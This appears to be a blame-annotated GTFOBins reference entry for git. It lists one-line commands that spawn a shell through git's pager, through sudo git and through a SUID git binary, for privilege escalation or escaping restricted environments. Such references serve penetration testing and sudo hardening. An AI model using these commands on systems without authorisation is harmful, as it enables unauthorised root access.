2018-07-22 15:06:54 +02:00
---
functions:
2018-10-05 19:55:38 +02:00
shell:
2018-09-07 01:00:01 +02:00
- code: PAGER='sh -c "exec sh 0<& 1"' git -p help
2019-03-31 12:03:34 +02:00
- description: This invokes the default pager, which is likely to be [`less` ](/gtfobins/less/ ), other functions may apply.
code: |
2019-06-23 17:16:13 +02:00
git help config
2019-03-31 12:03:34 +02:00
!/bin/sh
2018-10-05 19:55:38 +02:00
sudo:
2018-09-07 01:00:01 +02:00
- code: PAGER='sh -c "exec sh 0<& 1"' sudo -E git -p help
2019-06-23 17:24:38 +02:00
- description: This invokes the default pager, which is likely to be [`less` ](/gtfobins/less/ ), other functions may apply. Several capabilities might be dropped in the child process using this method.
2019-03-31 12:03:34 +02:00
code: |
2019-06-23 17:16:13 +02:00
sudo git help config
2019-03-31 12:03:34 +02:00
!/bin/sh
2018-10-05 19:55:38 +02:00
limited-suid:
2018-09-07 01:00:01 +02:00
- code: PAGER='sh -c "exec sh 0<& 1"' ./git -p help
2018-07-22 15:06:54 +02:00
---